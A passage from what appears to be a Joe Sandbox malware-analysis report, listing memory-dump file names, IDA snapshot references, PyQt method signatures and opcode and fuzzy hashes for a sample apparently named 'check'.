                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?tabletEvent@Event@@@TabletWindow@@
                                                                                                                                                                                                                • String ID: BJ8$QRasterWindow$focusOutEvent$focusOutEvent(self, a0: Optional[QFocusEvent])
                                                                                                                                                                                                                • API String ID: 2314446140-926177790
                                                                                                                                                                                                                • Opcode ID: a2991f8b9c74b687d925db61d083c52197152c58d32ef4b3be45d8c83a80b73b
                                                                                                                                                                                                                • Instruction ID: ccf9e74e05f2a35a3ac6ca40ac85d077f10b30bdb60ad760f0918e984a4614a8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a2991f8b9c74b687d925db61d083c52197152c58d32ef4b3be45d8c83a80b73b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 23210AB2A0CB46C2EB608F25E8842AA77A8FB95B84F544176DA8D53778DF3CD449C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?resetAbstractData@InternalItemModel@@
                                                                                                                                                                                                                • String ID: BJ8$QTextBlockGroup$timerEvent$timerEvent(self, a0: Optional[QTimerEvent])
                                                                                                                                                                                                                • API String ID: 59943102-2114369179
                                                                                                                                                                                                                • Opcode ID: b20ccd383174b49dd8a7aad11e58d737cb57195bc6a98d48fb780a3b215fe609
                                                                                                                                                                                                                • Instruction ID: 35c3fc1dfcb5983e9e5827388681633f3bff9b86b10f415176deebc04ba7a834
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b20ccd383174b49dd8a7aad11e58d737cb57195bc6a98d48fb780a3b215fe609
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6217FB260DB46C1EB60DB25E88426A73A9FB95B84F144172EE8D03B74DF3CD049D740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?write@DataItem@@StandardStream@@@
                                                                                                                                                                                                                • String ID: BJ9$QStandardItem$write$write(self, out: QDataStream)
                                                                                                                                                                                                                • API String ID: 350837266-2201310741
                                                                                                                                                                                                                • Opcode ID: 7d8a3a8dea42c75591ec769acb343bf59136f69a3a13d74e5c35af0942bba584
                                                                                                                                                                                                                • Instruction ID: 75fb76262005cff4ed04807b1ab374c4e2dcb2321a4c272f51319ac0a4828321
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d8a3a8dea42c75591ec769acb343bf59136f69a3a13d74e5c35af0942bba584
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C2121B1A0DB46C2EB608B25E48426A77A8FB95B85F5451B6DE8D03B74DF3CE145CB00
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?tabletEvent@Event@@@TabletWindow@@
                                                                                                                                                                                                                • String ID: BJ8$QRasterWindow$mousePressEvent$mousePressEvent(self, a0: Optional[QMouseEvent])
                                                                                                                                                                                                                • API String ID: 2314446140-1465782104
                                                                                                                                                                                                                • Opcode ID: 78a8af3b6581670a848366d0b1bf6ca02bb7321a044743da2a39fdaeb2ce22f3
                                                                                                                                                                                                                • Instruction ID: b2e595e2e0b41085e9369637038c1ef8ad0d35c7cd2ef9fc50ebb1cabe948c31
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 78a8af3b6581670a848366d0b1bf6ca02bb7321a044743da2a39fdaeb2ce22f3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3210AB2A0CB46C2FB608B35E8842AA77A8FB95B84F144176DA8D53774DF3CD449CB40
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?resetAbstractData@InternalItemModel@@
                                                                                                                                                                                                                • String ID: BJ8$QTextTable$timerEvent$timerEvent(self, a0: Optional[QTimerEvent])
                                                                                                                                                                                                                • API String ID: 59943102-828170972
                                                                                                                                                                                                                • Opcode ID: ba5eceb7b7befedd7aa4a95f9d539db04c16ff839530d3734d5024bab8614963
                                                                                                                                                                                                                • Instruction ID: 8ba22dc4d09b1ecd4c531e71ddca67bf23bb3126723d80a16657391ba6e1b525
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ba5eceb7b7befedd7aa4a95f9d539db04c16ff839530d3734d5024bab8614963
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 81212AB660DB46C2EB608F25E88426A77A8FB96B84F144176DE8D53B74DF3CE045C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?tabletEvent@Event@@@TabletWindow@@
                                                                                                                                                                                                                • String ID: BJ8$QWindow$keyPressEvent$keyPressEvent(self, a0: Optional[QKeyEvent])
                                                                                                                                                                                                                • API String ID: 2314446140-498570954
                                                                                                                                                                                                                • Opcode ID: 9ae3621cef3e836d55117811073ddce6f931f7c42da601680a3dd1bca0ec63fa
                                                                                                                                                                                                                • Instruction ID: a3119605a9c0081c74e76dd1dfe18a246f3a3e0eb79b166896fd178fca1a5c14
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ae3621cef3e836d55117811073ddce6f931f7c42da601680a3dd1bca0ec63fa
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A216DB260CB46C1EBA08B25E88426A77A8FB95B84F144176DA8D13774EF3CD049CB00
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?resetAbstractData@InternalItemModel@@
                                                                                                                                                                                                                • String ID: BJ9$QDoubleValidator$disconnectNotify$disconnectNotify(self, signal: QMetaMethod)
                                                                                                                                                                                                                • API String ID: 59943102-3714565819
                                                                                                                                                                                                                • Opcode ID: caa14c5bbfa9b45f50d0d22f26dd4638bdaa89a7d3cf5f396682005a8785db1b
                                                                                                                                                                                                                • Instruction ID: 9ed9e165c7ea9a4dda80fe792308fd8ce534f98a5b1952db4ebe854e9978fa1f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: caa14c5bbfa9b45f50d0d22f26dd4638bdaa89a7d3cf5f396682005a8785db1b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B2211BB2A0DB46C2EB608B25E88426A77E8FB95B84F544176DA8D43774DF3CE149C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?tabletEvent@Event@@@TabletWindow@@
                                                                                                                                                                                                                • String ID: BJ8$QRasterWindow$touchEvent$touchEvent(self, a0: Optional[QTouchEvent])
                                                                                                                                                                                                                • API String ID: 2314446140-1039132365
                                                                                                                                                                                                                • Opcode ID: 25690c8010e0cb5b129518b43edcdb961cadb02f0dab764a506515360ce7ee40
                                                                                                                                                                                                                • Instruction ID: fcfd977ae9f3d9f906d53371e0f4ff9803f3261056a50075537f6e62f958f45e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 25690c8010e0cb5b129518b43edcdb961cadb02f0dab764a506515360ce7ee40
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 98212FB2A0CB46D2EB608B35E88426A77A8FB95B84F544176DE8D53B74DF3CE045C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
